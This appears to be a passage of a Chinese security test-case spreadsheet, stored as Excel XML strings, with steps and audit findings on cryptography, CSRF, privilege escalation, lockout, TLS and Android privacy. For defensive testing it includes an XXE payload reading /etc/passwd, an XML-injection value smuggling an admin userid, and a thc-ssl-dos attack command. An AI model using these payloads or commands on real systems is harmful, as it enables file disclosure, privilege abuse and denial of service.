    <t>二进制域椭圆曲线标量乘法实现不当，攻击者可能通过时间攻击从使用带二进制域ECDSA认证的OpenSSL的服务器中恢复出TLS私钥，出于安全性考虑，应该使用素数域ECDSA签名认证方式。通过在源代码中进行关键字搜索，检查是否使用了素数域ECDSA签名认证方式：
1、如果调用OpenSSL执行ECDSA运算，使用EC_GROUP_new_by_curve_name(int nid)函数指定椭圆曲线时,应将nid与Openssl源码ec_curve.c的curve_list[]全局变量对应的曲线进行匹配，确保curve_list的comment结构变量（字符串）中包含“prime field”字样。
2、如果调用JDK执行ECDSA运算，条件(ECPublicKey.getParams().getCurve().getField() instanceof ECFieldFp)必须为true
3、如果调用iPSI，请确认是否开启了__IPSI_NO_EC_POLY_CURVE__宏并在调用CRYPT_createECParamsById(SEC_UINT32 uiParamID)函数指定椭圆曲线时，咨询iPSI开发人员填写哪个数字才可以指定素数域（非二进制域）上的椭圆曲线。</t>
  </si>
  <si>
    <t>1.能获取到源代码
2.同时进行加密和签名</t>
  </si>
  <si>
    <t>密钥的生成、使用、更新、销毁等操作是重要的管理操作。恶意的频繁触发密钥更新可能导致系统遭受DOS攻击、恶意的销毁密钥可能导致密文数据无法解密。为了追溯针对密钥管理操作的恶意攻击，密钥管理操作需要记录详细的日志。
1、密钥的生成、使用、更新、销毁等操作的操作是否记录日志
2、密钥的各项管理操作日志记录是否详细，是否记录操作的主体（人或设备）、时间、目的、结果等可用于事件追溯的信息</t>
  </si>
  <si>
    <t>1、能获取到源代码
2、代码中有接受用户输入</t>
  </si>
  <si>
    <t>1、若无短信，则忽略步骤2
2、无sms 等关键词</t>
  </si>
  <si>
    <t>1、反编译XX模块的AndroidManifest.xml，是否有android.permission.record_audio权限
2、对XX模块功能进行操作，通过手机管家检查是否有后台录音功能，录音时是否给用户明示
3、尝试对应用进行反编译检查代码中是否有包含Recorder的代码</t>
  </si>
  <si>
    <t>1、 Web业务运行正常
2、 已知待测目标URL，假设为http://www.exmaple.com/page.xxx
3、 待测目标存在参数输入，假设为name=value
4、 在某种情况下，用户输入被重新显示在网页上，包括名字、帐号、检索结果等等（说明目标网站服务器并没有对用户提交数据检测）</t>
  </si>
  <si>
    <t>1、对于有明确用户范围的系统，能配置策略限制登录用户的IP地址（或IP地址段）。
推荐采用白名单的方式进行限制。</t>
  </si>
  <si>
    <t>1、Web业务运行正常
2、已知目标网站的域名或IP地址
3、测试用机上需安装JRE
4、测试用机上有DirBuster软件</t>
  </si>
  <si>
    <t>1、产品支持密钥自动更新。
2、产品环境可用。</t>
  </si>
  <si>
    <t>1、对敏感数据的访问必须采用认证、授权或加密机制
2、WIFI直连应用中，导入联系人时不得将联系人信息明文永久暴露在SD卡存储区
3、（可选）Session ID和token等敏感信息在本地（数据库、磁盘等）存储时应进行加密</t>
  </si>
  <si>
    <t>1、敏感数据（如：口令）在非信任网络之间传输时是否支持默认使用sftp/https等安全传输协议
2、在非信任网络之间传输敏感数据方式
3、非信任网络中传输的对称密钥、共享秘密方式</t>
  </si>
  <si>
    <t>问题1（致命）：检查手机预置软件的签名情况，发现自研应用软件LiveColorWallpaper.apk使用公用的Android Debug签名，不符合签名规范，容易引起外界质疑。
问题2（致命）：该apk是预置的apk，位于/cust/hw/下，且签名信息却含有“huawei”字段，可以判断是华为自研的apk。但从证书指纹能确认不是华为的标准签名存在以下风险：1.由于不能确认是华为标准签名，不能保证完整性，存在被恶意篡改冒认的风险。2.引起客户和第三方安全组织的安全质疑。./cust/hw/ru/delapp/AppTemplate0.apkAPK，名称：AppTemplate0.apk，签名：所有者:CN=huawei，有效期: Sat Nov 26 15:53:00 CST 2011 至Sun Nov 13 15:53:00 CST 2061，证书指纹:        MD5:57:8F:79:93:A1:5D:BF:6D:F7:24:23:02:0A:A3:6A:2B        SHA1:AB:9C:C8:DB:75:E6:38:F0:A6:90:F2:53:E5:71:39:47:84:0B:84:B7，签名算法名称:SHA1withRSA 标准的华为签名的证书指纹如下：所有者:EMAILADDRESS=mobile@huawei.com, CN=AndroidTeam, OU=TerminalCompany, O=Huawei, L=Shengzhen, ST=Guangdong, C=CN，有效期: Wed May 25 14:10:49 CST 2011 至Sun May 18 14:10:49 CST 2036，证书指纹:        MD5:BB:7B:CE:1B:10:90:FC:3A:6B:67:EB:C8:87:01:AC:DD        SHA1:05:9E:24:80:AD:F8:C1:C5:B3:D9:EC:00:76:45:CC:FC:44:2A:23:C5，签名算法名称:SHA1withRSA</t>
  </si>
  <si>
    <t>问题1（致命）：蓝牙模块中有三处使用不安全的随机函数：int pin=（int）Math.floor(Math.randow()*1000000); private static int sConcatenatedRef = new Random().nextInt(256)。请参看DTS2014032800401
问题2（致命）：NFC 使用伪随机函数生成秘钥和序列号存在安全隐患：mRandom_SSID=(long)(100000+(Math.random()*89999999));mKey=(long)(100000+(Math.random()*89999999))+""。请参看DTS2014040104043
问题3（一般）：DH算法公私钥采用不安全的随机函数srand生成。
问题4（一般）：通过查阅代码，发现产品使用SHA(用户名+口令)方式加密用户口令保存到数据库。该方式可以通过彩虹表攻击破解口令。
问题5（一般）：ECS模块加密产生的key值，若type=2，AES 加密key值是random产生的一个长度为15个随机字符串+sessionID。建议：key需要加密后传输。建议去除固定密钥，使用安全的随机函数。</t>
  </si>
  <si>
    <t>问题1（严重）：由于系统中存在不需要CSRF token请求的白名单，同时判断请求URL的方式有问题，导致将正常的POST CGI请求改为/html/session.cgi/**（即在请求中加入一个白名单）,将绕过Token值的判断，CSRF机制无效。
问题2（一般）：csp没有类似csrf token的防护机制。可使管理员被诱骗点击恶意链接。
问题3（一般）：1)web系统正常登录；2)通过把正常的URL嵌入到别的网址发给用户点击，或者直接通过重放改写Referer字段；测试结果：设备能够正常响应，说明存在CSRF风险。
问题5（一般）：抓取POST报文，检查报文中不含有csrf-token。
问题6（一般）：1）使用IE登录TEX0的web管理页面。 2）同时登录黑客网站，该网站含有CSRF的攻击脚本，比如增加地址本操作。名为CSRF_001 。测试结果：用户的地址本被成功添加了CSRF_001这个用户。建议：增加CSRF token值，并且保证其强随机。
问题7（一般）：X-CSRFToken值在URL里面携带，容易被截取到造成攻击</t>
  </si>
  <si>
    <t>1、对于ftp和专用sftp用户（只用作文件传输，业务上不需要交互登录），禁止查看、编辑、执行ftp/sftp主目录的上一级目录或上N级目录内的文件、脚本或其他资源，且用户上传或下载文件的大小（可选)、路径必须在服务端进行校验。
2、专用sftp用户（只用作文件传输，业务上不需要交互登录）必须去掉SSH登录权限（将sftp用户的shell改成/bin/false）；
3、上传到服务器的系统文件、配置文件、补丁文件等不能具有可执行权限（如：7XX、77X、777等）。
常见错误：
1.SFTP帐号目录权限未做限制。
2.开启ftp服务上传文件，可占满磁盘空间，磁盘占满后，无法在后台正常写日志</t>
  </si>
  <si>
    <t>(1)电脑安装drozer客户端，并增加robber模块
(2)手机安装drozer服务端
(3)测试机打开usb调试端口连接电脑</t>
  </si>
  <si>
    <t>1、默认证书不生效
2、用户更新到设备的证书私钥支持加密存储，加密密码保存到设备时也要加密存储</t>
  </si>
  <si>
    <t>1、修改系统时间，使证书超期
2、查看告警是否有certificate_expired告警消息
ContentType为0x15 Alert</t>
  </si>
  <si>
    <t>方法一：
1、设备内存被占满不能被访问
方法二：
1、发送重新协商命令后，如果不报错，两次回车后返回HTTP/1.1 200 OK等信息，则代表重新协商成功存在漏洞</t>
  </si>
  <si>
    <t>1.mysql运行正常
2.mysql所在系统运行正常</t>
  </si>
  <si>
    <t>1.已知Web服务器域名或IP地址
2.Web业务运行正常
3. 目标系统使用了Web Service服务
4.测试用机上安装了AWVS</t>
  </si>
  <si>
    <t>1.启动SOAPUI工具
2.新建工程，导入WSDL文件
3.左侧将列出接口方法，找到上传二进制文件的接口
4.上传一个非常大的二进制文件，如Blob或者exe文件，查看系统是否异常
例如：
&lt;Envelope&gt; 
&lt;Header&gt; 
&lt;wsse:Security&gt; 
&lt;file&gt;jgiGldkooJSSKFM%()LFM$MFKF)$KRFWF$FRFkflfkfkkorepoLPKOMkjiujhy:llki-123-01ke123- 
04QWS03994k￡R$Trfe￡elfdk4r-45kgk3lg"￡!04040lf;lfFCVr$V$BB^^N&amp;*&lt;M&amp;NNB%...........10MB&lt;/file&gt; 
&lt;Signature&gt;…&lt;/Signature&gt; 
&lt;/wsse:Security&gt; 
&lt;/Header&gt; 
&lt;Body&gt; 
&lt;BuyCopy&gt;&lt;ISBN&gt;0098666891726&lt;/ISBN&gt;&lt;/BuyCopy&gt; 
&lt;/Body&gt; 
&lt;/Envelope&gt;</t>
  </si>
  <si>
    <t>1.登录系统，访问重要事务/敏感信息；
2.启动Wireshark进行嗅探；
3.提交用户密码/口令的重新认证操作；
4.查看Wireshark的嗅探记录，选择目的IP为服务器IP）的记录，右键并点击“Follow TCP Stream”，检查是否能够看到明文的口令/密码。
注：该用例属于产品必须定制用例，产品需要分析出所有重要事务和使用敏感信息的地方（需要SE和开发协助及签字确认）
注2：只提供本地接入、登录，做设备管理使用的场景可以不测，windows嗅探工具使用Wireshark，Suse使用tcpdump， solaris使用snoop。</t>
  </si>
  <si>
    <t>1.成功登录Web系统；
2.长时间未操作系统，前端页面出现加锁图层锁定页面；
3.通过删除前端锁定图层，尝试是否直接可以删除锁定图层，绕过锁定；
备注：按F12进入开发者模式，修改HTML标签属性。</t>
  </si>
  <si>
    <t>这个检测可以使 Web 服务器（ Linux 系统）崩溃，因为我们正在试图建立一个具有无限字符的实体。其它检测如下：
&lt;?xml version="1.0" encoding="ISO-8859-1"?&gt;
&lt;!DOCTYPE foo [
&lt;!ELEMENT foo ANY &gt;
&lt;!ENTITY xxe SYSTEM "file:///etc/passwd" &gt;]&gt;&lt;foo&gt;&amp;xxe;&lt;/foo&gt;</t>
  </si>
  <si>
    <t>1.系统正常运行
2.系统使用XML技术实现应用
3.界面的输入作为输出显示在界面上,如：假设有一个节点，其中的文本将显示给用户。如果该文本可以作如下修改：
&lt;html&gt;
$HTMLCode
&lt;/html&gt;
这就存在可能通过插入使用 CDATA 标记的 HTML 文本来避免输入过滤器的检查。</t>
  </si>
  <si>
    <t>1.目标应用运行正常
2.有正常的用户
3.每种浏览器的处理方式可能不同。</t>
  </si>
  <si>
    <t>1.系统运行正常
2.为用户分配不同的权限</t>
  </si>
  <si>
    <t>1.登录系统；
2.使用Web代理工具拦截请求信息，检查会话信息是否通过加密通道传输。</t>
  </si>
  <si>
    <t>1.访问系统管理员的登录界面，按要求提供正确的用户名、口令等信息，进行登录；
2.检查系统是否有强身份认证措施，例如双因素认证（如：口令 + Token 动态密码）、SSL 双向证书认证、生物认证（如：指纹认证、视网膜认证）等。
备注：验证码不属强身份认证措施，双因子认证的第二个认证条件需要通过其它通道获取，要做到渠道分离。</t>
  </si>
  <si>
    <t>1.系统正常运行
2.已知系统管理员帐号
3.配置完成WEB代理工具
4.被变更权限帐号已登录系统</t>
  </si>
  <si>
    <t>1.使用系统管理员帐号登录系统
2.在用户管理（或账号）界面，创建两个相同的帐号。
3.若客户端进行了限制，由使用WEB代理工具，拦截请求消息，修改请求消息中的帐号字段与已存在帐号一致。</t>
  </si>
  <si>
    <t>系统提示该帐号或IP已被锁定。
注：如果已经通过验证码防止帐号口令的暴力破解，那么，不强制遵循本条要求。</t>
  </si>
  <si>
    <t>1.连续N次使用错误的口令登录使帐号锁定；
2.使用另一个账号口令正常登录业务系统并退出；
3.使用另外一台机器，尝试登录步骤1中的账号
备注：本测试用例主要为了防止失败次数被破解的情况，请测试人员理解分析本产品的失败次数算法，设计客户端影响/破解/绕过失败次数的用例。</t>
  </si>
  <si>
    <t>方法一：
1.访问带有验证码的页面；
2.不断点击浏览器的“刷新”按钮，请求新的验证码；
3.看看验证码是否是随机生成的。
方法二：
1.打开带有验证码的页面，在验证码上右键选择属性后，复制验证码链接；
2.在浏览器中将链接粘贴到地址栏中，然后不断刷新页面
备注：
1.本部分测试用例主要是为了观察验证码的具体内容是否可以通过规律推理出来，请测试人员理解分析本产品所用验证码的原理，尝试设计规律挖掘用例。</t>
  </si>
  <si>
    <t>1.打开被测系统的登录页面；
2.使用正确的用户名，错误密码、错误的用户名，错误的密码（正确的密码）登录系统提示信息不能明确说明错误点信息。
3.使用WEB代理工具，拦截登录信息，并检查如下信息：
  a.检查返回的提示信息
  b.检查系统返回的错误代码
  c.检查系统返回信息的长度区别
  d.检查网址与网址复位向
  e.检查网页标题</t>
  </si>
  <si>
    <t>1.选择应用当前最稳定的JBoss软件包
2.jboss根目录必须在单独分区
3.Jmx-Console/web-Console安全配置
4.定制JBoss出错信息
5.……
备注：具体参考公司内部技术规范：《JBoss_安全配置规范_V1.2修订版》或更高版本</t>
  </si>
  <si>
    <t>1.Web服务器运行正常
2.Web系统采用了Tomcat容器
3.拥有Web服务器操作系统的帐号和口令
4.已知Web容器的部署，配置目录</t>
  </si>
  <si>
    <t>1.Web业务运行正常
2.已知目标网站的域名或IP地址
3.测试用机上需安装JRE
4.测试用机上有DirBuster软件</t>
  </si>
  <si>
    <t>1.Web业务正常运行
2.待测页面能够正常访问</t>
  </si>
  <si>
    <t>1、检查结果为：pass
2、执行结果为：-e 2</t>
  </si>
  <si>
    <t>业界标准 (CIS)9.4 Restrict root Login to System Console ----《CIS_SUSE_Linux_Enterprise_Server_11_Benchmark_v1.0.0》(P.136)
(CIS)9.2.8 Disable SSH Root Login ----《CIS_SUSE_Linux_Enterprise_Server_11_Benchmark_v1.0.0》(P.134)</t>
  </si>
  <si>
    <t>方法1：使用SecureCat工具扫描操作系统，确认检查项9.5 Restrict Access to the su Command (Scored)是否pass
方法2：
1.登陆被测系统，进入命令行模式
2.执行命令grep pam_wheel.so /etc/pam.d/su</t>
  </si>
  <si>
    <t>1.日志内容必须包含日志基本信息：
? Where（执行动作的设备标识.发起请求的设备标识、IP地址或硬件地址）
? Who（本地应用的身份、请求者的身份）
? What（请求的动作、输出、结果代码、错误码、事务ID、应用/组件/服务/对象/方法、应用版本信息）
? When（UTC格式的时间戳）
注：日志不限于形式，文件或者数据库都可以。
2.如下日志也被记录：
1）FTP/SFTP的文件上传下载
2）IPSec建立通道的对端IP地址、身份信息</t>
  </si>
  <si>
    <t>1、不允许收集隐私声明中没有列出的个人数据，不允许将个人数据用于没有声明的目的
2、个人数据的采集范围、使用目与隐私声明中的描述保持一致</t>
  </si>
  <si>
    <t>1、检查涉及个人数据处理的产品或服务是否提供隐私声明
2、检查向运营商或企业客户提供的隐私声明内容是否完整
3、检查以华为名义直接向数据主体提供的产品或服务时，提供的隐私声明是否经过法务部批准，是否在web产品页面或是界面上提供隐私声明或隐私声明的链接</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</si>
  <si>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4、放置15分钟，在其间进行灭屏亮屏、休眠唤醒、网络断开再连接等操作，观察LBE是否可以检测出后台调用摄像头行为</t>
  </si>
  <si>
    <t>1、检查手机管家是否提示应用后台删除短信/彩信。如无提示，则测试通过。如有提示，需检查在手机管家提示前，应用本身是否事前提示用户后台删除短信/彩信（可以通过弹框的方式或者在用户协议中声明）。如无提示则测试fail
3、如果应用真正退出，则测试通过
4、LBE不会弹出后台删除短信/彩信记录提示</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</si>
  <si>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4、放置15分钟，在其间进行灭屏亮屏、休眠唤醒、网络断开再连接等操作，观察LBE是否可以检测出后台修改短信/彩信记录行为</t>
  </si>
  <si>
    <t>1、首次进入应用，在用户协议界面，开启wifi，检查LBE是否上报wifi联网
2、首次进入应用，在用户协议界面，开启数据业务，检查LBE是否上报联网行为
3、首次进入应用，在用户协议界面，开启GPS，检查LBE是否上报定位行为</t>
  </si>
  <si>
    <t>1、系统用于安全用途的随机数为安全的随机数生成器产生。
2、系统自动生成的口令应使用安全的随机数生成器，且长度不小于6个字节。</t>
  </si>
  <si>
    <t>系统账号的缺省口令应符合复杂度的要求，并在客户资料中提醒用户修改：
1.查看产品资料，检查系统内置账号的缺省口令是否符合复杂度的要求。
2.查看产品资料，检查是否明确提示用户修改账号默认口令。</t>
  </si>
  <si>
    <t>1、使用正确的A帐号和口令登录客户端，在系统设置中，点击自动保存口令，退出客户端。
2、启动FileMon工具，设置过滤条件为客户端的主程序名，开始监视文件活动，运行客户端，输入A帐户名，这时口令输入框会自动填入口令。停止FileMon的监视，查看客户端访问的文件。
3、分析客户端访问的文件，可以发现A帐户的数据文件user.db。使用ultraedit工具打开user.db，查看数据文件中保存的口令是否以明文方式或不安全加密方式存储。</t>
  </si>
  <si>
    <t>1、对于仅包含一种字符的，需要提示用户密码强度低，不允许设置，并提示用户修改为更强一些的口令
2、对于包含两种字符的，提示密码强度为中，并能设置成功
3、对于包含三种字符或全部包含的，提示密码强度为高，并能设置成功
4、如果口令和账号或账号的倒写一样，则不允许设置，并提示用户修改强度更强的口令</t>
  </si>
  <si>
    <t>人工测试：
1、进入设置密码的页面（如注册、修改密码），输入不符合《终端口令安全要求》中规定的复杂度的密码，检查软件是否会提示用户重新设置更强的密码。
2、用户输入弱密码，是否会提示用户的密码强度</t>
  </si>
  <si>
    <t>RSA签名时采用PSS填充方式比PKCS1-V1.5填充具有更高的可证明安全性。检查RSA签名填充方式是否符合要求：
1、对于OpenSSL算法库，签名时应该先调用RSA_padding_add_PKCS1_PSS进行PSS填充，再对填充结果调用RSA_private_encrypt并指定RSA_NO_PADDING填充方式进行签名，验证签名时应该先调用RSA_public_decrypt进行公钥解密，再调用RSA_verify_PKCS1_PSS验证签名；
2、对于JDK，应该使用第三方开源的Bouncy Castle库提供的PSSParameterSpec类实现PSS填充方式的数字签名；
3、如果调用iPSI，则不满足此项要求，iPSI不支持PSS填充方式。</t>
  </si>
  <si>
    <t>1.获取到源代码。
2.使用椭圆曲线算法并使用了ECDSA认证方式。</t>
  </si>
  <si>
    <t>目的和意义：
随着密码分析技术的发展和计算机处理能力的提高，当前安全的密码算法可能在以后某个时间点开始就不再安全，为了应对此类问题，应用系统使用的算法应该可配置，当前使用的某些密码算法在未来不再安全时，可以及时的平滑的切换到更安全的密码算法</t>
  </si>
  <si>
    <t>1、反编译apk软件包，检查XX模块的AndroidManifest.xml，是否有android.permission.send_sms权限
2、使用XX模块非上网功能和短信功能，2小时，同时抓取QXDM包，检查QXDM Message中是否包含关键字"SMS"等消息
QXDM抓包方法请参考：
http://3ms.huawei.com/hi/group/2347/thread_4098251.html?mapId=3232419</t>
  </si>
  <si>
    <t>1、有手机管家且在设置中对该应用监控改为“提示”
2、手机root</t>
  </si>
  <si>
    <t>1.登陆高权限用户，开启fiddle2抓包，并操作相关的功能，如：查看系统配置、远程重启、下载、上传文件等。
2.注销后通过监控级别权限用户进行登陆，获取会话ID。
3.修改第一步抓到的数据报文中的会话ID字段，然后重放，观察结果。</t>
  </si>
  <si>
    <t>1、 Web业务运行正常
2、 已知待测目标URL，假设为http://www.exmaple.com/page.xxx
3、 待测目标以POST方式提交参数，显示为表单方式
4、 在某种情况下，用户输入被重新显示在网页上，包括名字、帐号、检索结果等等（说明目标网站服务器并没有对用户提交数据检测）</t>
  </si>
  <si>
    <t>1.判断网站根目录是否存在crossdomain.xml文件，如果不存在结束检查；
2.如果存在crossdomain.xml文件，查看中domain值是否为星号，存在跨域访问的风险，说明存在问题。</t>
  </si>
  <si>
    <t>1、Web业务运行正常
2、已知待测目标URL，假设为http://www.exmaple.com</t>
  </si>
  <si>
    <t>1.文件夹及文件仅单一用户具备权限。
2.该单一用户为本文件夹及文件的属主，具备可读、可写、可执行权限。
3.该单一用户所在组内其他用户对本文件夹及文件可读、可执行。
4.其他用户组及组内成员对本文件夹及文件不可读、不可写、不可执行。</t>
  </si>
  <si>
    <t>1、使用高级别权限账号A登陆系统，尝试使用系统提供的重要功能（例如：补丁加载等低级别用户无法执行的操作）。
2、在另一台PC使用管理员账号B登陆系统，并修改A的权限为低级别。
3、在账号A登陆的PC，再次尝试步骤1中的重要功能，看能否操作成功。</t>
  </si>
  <si>
    <t>1、错误提示中禁止包含密码、Session ID、用户信息，程序运行环境等敏感信息
2、URL中禁止存放Session ID、Token等敏感信息
3、日志文件中禁止包含密码、密钥、银行账号、用户名等敏感信息
4、调试信息中禁止包含密码、密钥等敏感信息</t>
  </si>
  <si>
    <t>1、对敏感数据的访问机制
2、WIFI直连应用中，导入联系人存储形式</t>
  </si>
  <si>
    <t>问题1（提示）：AES128和AES256加密使用的IV固定。
问题2（提示）：对被管理设备的SNMP团体名的加密过程建议使用初始向量IV，避免相同的明文产生相同的密文。
2.1.3 IPsec Initialisation Vector Vulnerability The IPsec implementation in the eNodeB supports the Encapsulated Security Protocol (ESP) – the IPsec mode that uses encryption to protect the privacy of communications. In this implementation, the selection of initialisation vector (IV) values for the encryption routines is flawed. As a result, there is the potential for predictable and/or repetitive IV values, which may be used by an attacker to surmise information about the data that has been encrypted.</t>
  </si>
  <si>
    <t>问题1（致命）：web页面有越权漏洞，权限控制只在前段限制，后台未做校验。参看DTS2014032701327
问题2（致命）：修改clj的用户信息，拦截请求，添加参数sysStaffVO.staffId=101 sysStaffExtVO.staffId=101 发送请求，响应成功： 101的信息被修改成功。参看DTS2014071801181</t>
  </si>
  <si>
    <t>问题1（严重）：资料中有说明可以给外部操作员设定操作时限，新建管理员yww2，设定操作时限，只允许限定日期，限定星期，限定时段访问后，使用yww2账号在该时段登录，可以使用MOD OP修改自身操作时限约束，使自身长期拥有该权限。参考DTS2014041108381
问题2（严重）：配置管理员“configer”只拥有“配置”权限（无管理员级别调整等权限），“configer”可以通过配置SNMP的团体字，然后通过eSight接入USG6600，将配置文件导出，在配置文件中更改自己的权限为所有权限（最高管理员），再将配置文件导入设备，达到越权目的。(说明：eSight可以用非法自己搭建的，知道设备IP和团体字就能接入USG6600，不一定需要登录现网的eSight)。</t>
  </si>
  <si>
    <t>1、用于调试和测试目的的帐号在发布前必须自动删除
2、系统安装、初始化配置过程中使用到的临时帐号必须自动删除或者提供手工删除的指导书</t>
  </si>
  <si>
    <t>1、用户使用了自定义的SSL证书私钥后，验证默认证书是否生效
2、用户更新到设备的证书的存储安全</t>
  </si>
  <si>
    <t>1、TLS需要产生有致命错误告警
ContentType为0x15 Alert</t>
  </si>
  <si>
    <t>1、使用wireshark对用户登录系统的TLS握手过程进行抓包；
2、握手协议信息的发送顺序必须和“握手协议完整流程”一致；</t>
  </si>
  <si>
    <t>方法一：
使用脚本ssl_Renegotiation.sh检测（修改脚本里IP和端口为自己测试系统）
方法二：
1、 CMD进入thc-ssl-dos目录;
2、命令thc-ssl-dos.exe  &lt;目标IP地址&gt;  &lt;目标端口号&gt;  --accept启动Dos攻击
方法三：
1、进入openssl-1.0.1i目录，使用命令openssl s_client -connect &lt;目标IP地址&gt;:&lt;目标端口号&gt; 建立openssl连接；
2、发送命令重新协商(直接复制下面一行命令后粘贴)：
R</t>
  </si>
  <si>
    <t>首先通过任务管理器启动mysql服务，命令行进入mysql安装目录下的bin目录，执行以下命令：
windows：mysql -u用户名 -p密码
linux：./mysql -u用户名 -p密码
1.登陆mysql命令行管理页面；
2.通过命令"\s"查看版本和补丁是否是最新版本。</t>
  </si>
  <si>
    <t>防病毒软件部署指南，主要包含：
防病毒软件部署前的准备、流程、执行步骤失败后回退处理，以及病毒特征库升级配置指导（Windows系统平台必选）。</t>
  </si>
  <si>
    <t>1.系统正常运行
2.系统功能通过FLASH实现</t>
  </si>
  <si>
    <t>1.Web Service运行正常
2.已知WSDL文件，且存在上传二进制文件接口
3.已获取SOAPUI工具</t>
  </si>
  <si>
    <t>无法复制口令输入框中的字符串
说明：这里指的是不能从口令输入框“拷出”数据，能否“拷入”（粘贴）是不限制的。</t>
  </si>
  <si>
    <t>1.在2台主机上登录系统
2.针对帐号进行操作，主要是针对帐号下的资源进操作，如同时减少帐户金额。
3.为触发同时操作，最好的方法是编写脚本，两边同时批量发送。
测试思路：主要为同时对系统的同一资源进行处理，是否存在最后业务逻辑存在问题。具体如下例：
同时提交请求类的交易验证。主要验证同时对帐户的额度进行减少操作，两次均成功后，但减少操作只进行了一次。（积分兑换，金额扣费等）
用户 1 检查帐户 A （ = 100 分）
用户 2 检查帐户 A （ = 100 分）
用户 2 需要从帐户 A 拿取 10 分（ = 90 分） ，并把它放在帐户 B （ = 110 分）
用户 1 需要从帐户 A 拿取 10 分（仍然认为含有 100 个分） （ = 90 分） ，并把它放到 B （ = 120 分）
结果：
帐户 A 90 分
帐户 B 120 分</t>
  </si>
  <si>
    <t>1.系统正常运行
2.业务逻辑依赖客户端JS完成</t>
  </si>
  <si>
    <t>通过构造与XML节点相同的节点信息，使用部分内容失效，换成修改后的新的节点内容。导致系统的功能受破坏。
Username: tony
Password: Un6R34kb!e
E-mail: s4tan@hell.com&lt;/mail&gt;&lt;userid&gt;0&lt;/userid&gt;&lt;mail&gt;s4tan@hell.com</t>
  </si>
  <si>
    <t>1.用户a登陆系统，找到下载配置文件界面，例如http://www.exmaple.com/download/usera/config.xml
2.尝试更改URL路径，在浏览器输入地址下载相关文件
http://www.exmaple.com/download/userb/config.xml
http://www.exmaple.com/download/userc/config.xml
http://www.exmaple.com/admin/config.xml……
3.分析服务器返回信息，如果可以越权获取到其他用户的私有、敏感文件，则说明存在漏洞。</t>
  </si>
  <si>
    <t>1.进入系统进行业务请求；
2.使用Web代理工具拦截请求信息，检查HTTP响应消息中是否使用"Expires:0"和"Cache-Control: max-age=0"指令。</t>
  </si>
  <si>
    <t>1.打开登录界面，或重设密码界面等。
2.测试在若干次登录失败后确实会锁定账户。如果你已经知道了某个合法用户名，故意输入至少N次的错误密码试图登录，验证帐户是否被锁定。
3.通过编写工具通过多次发送大量用户名密码方式，将大量用户锁定。
注：可以事先获得大量的用户名信息。</t>
  </si>
  <si>
    <t>1.使用系统管理员帐号登录系统
2.在用户管理（或账号）界面，检查“操作员帐号长时间未使用自动锁定”是否可配置。
3.操作员“长时间未使用自动锁定”，该时间段可配置，取值范围：0-999 天，当取值为 0 时，表示不执行自动锁定策略，建议默认：60 天。。</t>
  </si>
  <si>
    <t>1.系统正常运行
2.已知系统管理员帐号
3.配置完成WEB代理工具</t>
  </si>
  <si>
    <t>锁定时长过后，可以正常登录。
注：管理员可以手动解锁时，不需要有此功能</t>
  </si>
  <si>
    <t>1.连续N次使用错误的口令登录使帐号锁定；
2.关闭客户端，并清除客户端所有本地记录（如历史记录等等）；或者使用该账号在另外一台pc登陆
3.再次打开客户端，使用步骤1中的帐号正确的口令登录应用系统
备注：本测试用例主要为了防止锁定被客户端破解的情况，请测试人员理解分析本产品的锁定机制，设计客户端影响/破解/绕过锁定机制的用例。</t>
  </si>
  <si>
    <t>1.访问带有验证码的页面；
2.右键点击验证码，在弹出右键菜单中选择“属性”；
3.在弹出的属性窗口中拷贝验证码图片所对应的完整的地址URL（例如：http://10.71.99.12:8080/training/public/getcode.jsp?code=1234）。
4.打开新的浏览器窗口，将验证码对应的完整的URL拷贝到浏览器的地址栏，然后按回车；
5.刷新页面查看验证码是否与步骤3的验证码一致。</t>
  </si>
  <si>
    <t>1.系统中存在恢复功能，如忘密码等，进入该功能界面
2.输入正确用户名、错误用户名，邮箱，电话等信息后并提交
3.使用WEB代理工具，拦截登录信息，查看系统返回的信息，无法识别有效的用户名。检查信息如下：
  a.检查返回的提示信息
  b.检查系统返回的错误代码
  c.检查系统返回信息的长度区别
  d.检查网址与网址复位向
  e.检查网页标题</t>
  </si>
  <si>
    <t>1.WebLogic应安装在独立的服务器上
2.选择应用当前最稳定的Resin软件包
3.web根目录必须在单独分区
4.配置WebLogic 仲裁提供程序
5.……
备注：具体参考公司内部技术规范：《WebLogic_安全配置规范_V1.0》或更高版本</t>
  </si>
  <si>
    <t>1.Web服务器运行正常
2.Web系统采用了Jboss容器
3.拥有Web服务器操作系统的帐号和口令
4.已知Web容器的部署，配置目录</t>
  </si>
  <si>
    <t>业界标准 (DT)Req 3.01-27 安全相关的事件必须有一个精确的时间戳和一个唯一的系统参考记录。
Security relevant events must be logged with a precise timestamp and a unique system reference.
8.1.2管理面所有的用户活动、操作指令必须记录日志，日志内容要能支撑事后的审计，记录包括用户ID、时间、事件类型、被访问资源的名称、访问结果等；日志要有访问控制,只有管理员才能有删除权限。</t>
  </si>
  <si>
    <t>方法1：使用SecureCat工具扫描操作系统，确认检查项8.1.18 Make the Audit Configuration Immutable (Scored)是否pass
方法2：
1.登陆被测系统，进入命令行模式
2.执行命令 grep "^-e 2" /etc/audit/audit.rules</t>
  </si>
  <si>
    <t>1.登陆被测系统，进入命令行模式
2.运行下面的命令，查看/etc/ssh/sshd_config 输出是否符合预期：
# grep "^AllowUsers" /etc/ssh/sshd_config
AllowUsers &lt;userlist&gt;
# grep "^AllowGroups" /etc/ssh/sshd_config
AllowGroups &lt;grouplist&gt;
# grep "^DenyUsers" /etc/ssh/sshd_config
DenyUsers &lt;userlist&gt;
# grep "^DenyGroups" /etc/ssh/sshd_config
DenyGroups &lt;grouplist&gt;</t>
  </si>
  <si>
    <t>1、检查结果为：pass
2、执行结果为：搜索结果为空
注：使用方法2时，如果查询出现大量文件，请分别查询各单目录下的情况，如执行如下命令：
find /etc -nouser -print</t>
  </si>
  <si>
    <t>使用SecureCat工具扫描操作系统，确认检查项
12.2 Verify Permissions on /etc/passwd (Scored)是否pass
12.3 Verify Permissions on /etc/shadow (Scored)是否pass
12.4 Verify Permissions on /etc/group (Scored)是否pass
12.5 Verify User/Group Ownership on /etc/passwd (Scored)
12.6 Verify User/Group Ownership on /etc/shadow (Scored)
12.7 Verify User/Group Ownership on /etc/group (Scored)是否pass</t>
  </si>
  <si>
    <t>1.登陆系统，然后进行FTP/SFTP上传文件、下载文件、删除文件的操作，操作后进行审计日志的观察
2.通过IPSec同对端建立通道，通道建立后进行日志的观察</t>
  </si>
  <si>
    <t>1.不存在无法修改口令的用户
2.不存在硬编码的帐号和口令</t>
  </si>
  <si>
    <t>1、收集的个人数据有明确的目的及保护措施。
